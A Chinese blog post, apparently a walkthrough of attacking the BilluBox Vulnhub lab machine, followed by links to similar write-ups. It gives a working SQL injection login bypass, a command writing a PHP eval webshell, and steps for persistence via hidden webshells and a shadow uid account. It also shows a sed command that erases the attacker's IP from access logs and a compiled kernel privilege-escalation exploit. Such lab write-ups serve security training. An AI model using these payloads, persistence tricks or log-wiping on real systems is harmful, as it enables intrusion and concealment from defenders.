BilluBox靶机入侵与提权,和权限维持操作

最新推荐文章于 2023-04-12 13:49:59 发布
最新推荐文章于 2023-04-12 13:49:59 发布
阅读量185 收藏 1
点赞数
文章标签: 网络 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kiihuang/article/details/130046186
版权
  • 查找目标ip 
    nmap -sn 192.168.18.0/24

     

  • 查找端口 
    nmap -sS -p 1-2000 192.168.18.190

22/tcp open  ssh
80/tcp open  http

  • 存活端口进行访问

 

  • 进行一个子域名扫描 
    http://192.168.18.190/imgages        #图片地址       
http://192.168.18.190/test.php      #显示文件参数为空,应该是进行文件读取
http://192.168.18.190/add.php       #上传文件路径
http://192.168.18.190/head.php        #图片
http://192.168.18.190/index.php     #首页
http://192.168.18.190/show.php       #空白
http://192.168.18.190/c.php            #空白
  • 尝试文件包含
  • 实际发现,是文件下载

 

  • 下载域名,扫出来的php
  • c.php中有mysql的用户名和密码

 

  • 没有开启,远程访问,无法连接数据库
  • index.php中有sql语句的过滤规则

 

  • 重新构造select语句 
    select * from name where password= '123456' and username = 'huang' ;

select * from name where password= '123456\' and username = 'or 1=1#'

  • 成功登录
  • 下载登录后的页面源码发现保存地址

 

  • 上传图片马

 

  • 和此处的文件包含相互配合

 

  • 进行抓包并构造上传好的图片马的路径
  • GIF89a
  • 猜测成功

 

  • 成功,接下来直接连接

 

  • 连接失败,post请求的文件包含不知道要怎么写,但自己还是可以使用

 

  • 另外在写一句木马用来连接 
    load=uploaded_images/456.jpeg&continue=continue&cod=file_put_contents("uploaded_images/mm.php",'<?php @eval($_POST["code"]); ?>');

  • 成功

 

  • 上传哥斯拉的木马
  • 发现之前没有发现过的目录和php文件

 

  • 原来是数据库管理目录

 

  • 使用之前的mysql密码这次登录成功了
  • 拖库成功

 

  • 查看mysql配置文件,里面有root账户和密码

 

  • 账户密码正确的,越权成功

 

  • 复制多份木马并隐藏

 

  • 准备影子用户和给予uid权限

 

  • 删除之前留下的木马

 

  • 进入日志 
    cat access.log | grep -a 192.168.18.184* | wc -l   #查找有关日志
73417
sed -i '/192.168.18.184/d' access.log 
cat access.log | grep -a 192.168.18.184* | wc -l
0

  • 删除指定日志

 

  • 结束
  • 提权方式2
  • 使用,uname获取版本号,然后使用searchsploit查询漏洞

 

  • 上传37292.c

 

  • 进行编译,然后执行

 

  • 如果出现cc1错误,可以执行下面代码更改path 
    export PATH=/usr/local/bin:/usr/bin:/bin

gg_Go_game
关注
渗透靶场——Vulnhub:Billu_Box
tlovejr的博客
02-25 1050
部署环境: 提供镜像文件后,直接用虚拟机打开即可(中间会遇到错误什么的,直接点击重试或者继续即可),连接方式用NET方式连接。 Kali机ip地址:192.168.40.129 靶机ip地址:192.168.40.149 首先查看存活的靶机ip地址,在这里一共有三种方法,可以自己选择一种自己比较喜欢的。 nmap探测存活主机 Nmap -sn 192.168.40.0/24 Netdiscover探测存活主机(时间会有点长) netdiscover -i eth0 -r 192.168.
Billu_box渗透测试
Darklord.W
04-11 831
Billu_box渗透测试 0x00实验环境 靶机Billu_boxIP地址:192.168.8.207 测试机:Kali,IP地址:192.168.8.145; 0x01实验流程 信息收集——主机发现、端口扫描 渗透测试 0x02实验步骤 netdiscover主机发现 Masscan 及nmap扫描 进入web界面 首先,扫描web目录: 得到:...
Billu_b0x2内网渗透(多种提权方法)靶场-vulnhub
qq_35664104的博客
10-03 1704
本次来试玩一下vulnhub上的Billu_b0x2,下载地址。 下载下来后是 .ova 格式,建议使用vitualbox进行搭建,vmware可能存在兼容性问题。靶场推荐使用NAT(共享)模式,桥接模式可能会造成目标过多不易识别。 IP win7: 192.168.31.44 kali: 192.168.31.17 靶机: 192.168.31.132 信息搜集 主机发现得到靶机ip,接着进行端口扫描 nmap -sV -A -p- 192.168.31.132 开放了22, 80,
渗透测试实战6——billu靶机入侵
浅浅的博客
05-10 1242
目录 一、实验环境 二、实验步骤 主动信息收集 端口探测——80端口(http) 文件包含getshell 提权 查找数据库配置文件 一、实验环境 攻击机(Kali):192.168.247.165 靶机billu):192.168.247.166 二、实验步骤 主动信息收集 1、主机发现 2、端口扫描 靶机...
vulnhub靶机渗透 Billu_b0x
RestoreJustice的博客
03-18 389
尝试包含/etc/passwd文件,GET方法无法访问,使用POST成功下载passwd文件。​ 下载后用 VMware 或者 VirtualBox 打开,并配置好网卡,靶机与攻击机应置于同一网络下,靶机默认是桥接模式,能用攻击机连接到就行。访问发现add.php是一个文件上传页面,无论上传什么文件都提示选择图片上传,哪怕是上传的图片,推测应该是后端没做相应处理,用来干扰的空壳文件。网页登录,进入主页发现有显示用户和添加用户,且添加用户可上传头像,头像图片保存在/uploaded_images/目录。
海贼王渗透靶场 Vulnhub:Billu_Box
qq_47168481的博客
09-26 730
海贼王渗透靶场
crasher.tar(DC3靶机所需提权exp-2)
02-20
DC3靶机所需提权exp
exploit.tar(DC3靶机所需提权exp-1)
02-20
39772.zip
116.网络安全渗透测试—[权限提升篇14]—[Windows 2003 Metasploit提权&权限维持&开启3389]
qwsn
07-08 2587
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。 【图略】#键入 启动 metasploit #进入监听模块 #查看系统信息 #查看进程 pid #迁移进程 #当前用户
65.Vulnhub靶机渗透之环境搭建及JIS-CTF入门和蚁剑提权示例(一)1
08-03
中国蚁剑则用于上传木马、执行命令和提权,例如,作者提到的“一句话木马”是Web渗透中常用的一种技巧,可以用来获得远程命令执行的能力。 提权是渗透测试中的关键环节。在文中,作者提到了蚁剑的使用来提升权限,...
靶机练习之Billu_b0x
10-04
通过该靶场,能够初步了解web渗透的基本流程。小白在了解了web各种漏洞原理,之后,可以练习一下该靶场,靶场做法很多。我也是一个小白,来这里记录一下学习的过程,不喜勿喷!!!感谢!!!
渗透测试实战-Fowsniff靶机入侵-附件资源
03-02
渗透测试实战-Fowsniff靶机入侵-附件资源
渗透测试提权靶场Billu box 刷题记录
Sumarua的博客
12-20 4899
PS:最近项目实在太忙了没时间出文章,拿以前的笔记水一篇吧。 kali渗透综合靶机Billu_b0x靶机 靶机下载地址:https://download.vulnhub.com/billu/Billu_b0x.zip 信息收集 可利用工具如下 Netdiscover(主机ip收集) Masscan(端口收集) Nmap(服务加端口) netdiscover -i eth0 -r 192.168.9.0/24 sudo masscan --rate=10000 -p0-65535 192.168.9.
漏洞复现-Billu_box
qq_43381463的博客
02-27 259
漏洞复现-Billu_box
Billu_box靶场实战演练
weixin_52049485的博客
01-05 664
部署环境 虚拟机:Kali ip:192.168.202.138 靶机Billu_box ip:192.168.202.140 信息收集 1、通过nmap扫描发现靶机 ip地址:192.168.202.140 开放了22、80端口 中间件:Apache/2.2.22 (Ubuntu) 操作系统:Linux 2、通过Kali自带的DIRB工具+字典扫描目录 漏洞发现 通过目录扫描发现了phpinfo** phpmyadmin界面,注意的是扫描目录为“phpmy” 发现“file”内容的网址,发现任意
billu box渗透测试
win176489的博客
06-13 1070
本地访问目标网站 登陆框上方提示show me your sqlli skills 首先测试sql注入 在username password提交测试注入的参数和利用sqlmap注入都显示无法注入 利用kali的dirb 爆破一下网站的地址 dirb “http://192.168.31.16/” /usr/share/dirb/wordlists/big.txt 得到一个test的地...
CTF综合靶场渗透系列-Billu_b0x
lza20001103的博客
10-11 3957
CTF综合靶场渗透系列-Billu_b0x
05_靶机Billu_b0x改版:任意文件下载,文件包含,图片马shell反弹,内核提权
最新发布
Hack word
04-12 551
1、本次渗透靶机基于网络上的靶机有改动的地方,参考了一些大佬的文文章很受用也学到了新奇的知识:利用任意文件下载漏洞得到数据库账户,进入phpmyadmin后台得到用户账户,尝试木马写入,无果创建账户进入网站后台,万能密码绕过登录利用文件包含与图片马拿到Webshell与会话shell利用Linux内核版本漏洞提权2、有一处知识点是之前没有见过的:写入php木马建立反弹会话shell。
Jangow靶机攻击实战教程:提权权限升级
整个流程展现了黑客利用各种工具和技术进行网络渗透,从基础的端口扫描到高级的权限提升和文件操作,展现了攻击者逐步升级权限、获取信息的过程。对于网络安全研究人员和防御者来说,这篇文章提供了有价值的学习资料...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值